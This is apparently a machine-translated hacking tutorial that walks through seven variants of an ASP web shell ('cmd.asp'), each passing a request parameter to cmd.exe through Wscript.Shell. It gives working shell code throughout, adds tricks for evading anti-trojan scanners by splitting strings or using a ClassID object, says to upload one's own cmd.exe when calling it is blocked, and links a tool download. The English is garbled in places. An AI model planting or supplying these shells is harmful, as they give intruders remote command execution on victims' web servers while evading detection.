Tool: Http://pan.baidu.com/s/1o6jxAgq
first, to see Zzzeva free FSO cmd.asp
<input type=text name= "cmd" size=60>
<input Type=submit value= "Run" ></form>
<textarea readonly cols=80 ROWS=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
" & Request.Form ("cmd")). STDOUT.READALL%>
</textarea>
Does it feel a little long? Writing is a bit hard to write when hackers inject. Let's change it.
second, change the Zzzeva FSO-free cmd.asp
<textarea readonly cols=80 rows=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>
Usage is xx.asp?cmd=net user
This is to get the results are convenient, in fact, if not for the beautiful, but also shorter, then the third
A third, shortened cmd.asp.
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>
The Response.Write is used here, and the variables are in CMD. Why not be shorter?
Fourth, a shorter cmd.asp.
<%=server.createobject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
It seems to be the shortest. Apart from being short, we have to work in other places.
Fifth, Wscript.Shell be renamed how to do?
Code:
<object Runat=server Id=kk Scope=page
Classid= "Clsid:72c24dd5-d70a-438b-8a42-98424b88afb8" ></ObjEct>
<%=kk.exec ("cmd/c" +request ("cmd")) .stdout.readall%>
Of course, the ClassID value differs in different systems. This has to be changed by itself
Sixth, by some kill ASP Trojan software detection out how to do?
Take the variables apart. Code:
<%=server.createobject ("ws" + "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
Or
<%=server.createobject ("ws" & "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>
Here the code in the quotation marks can be arbitrarily dismantled, like can also be broken into
<%=server.createobject ("ws" & "Cript.shell"). EXEC ("C" & "md.exe/c
"&request (" C ")) .stdout.readall%>
7th one, Cmd.exe do not let the call do?
You upload a cmd.exe yourself, put it in a directory that can be called, and the code changes as follows:
<%=server.createobject ("Wscript.Shell"). EXEC ("e:\aspx\cmd.exe/c
"&request (" C ")) .stdout.readall%>
About ASP, php,jps a word trojan--Chinese kitchen knife use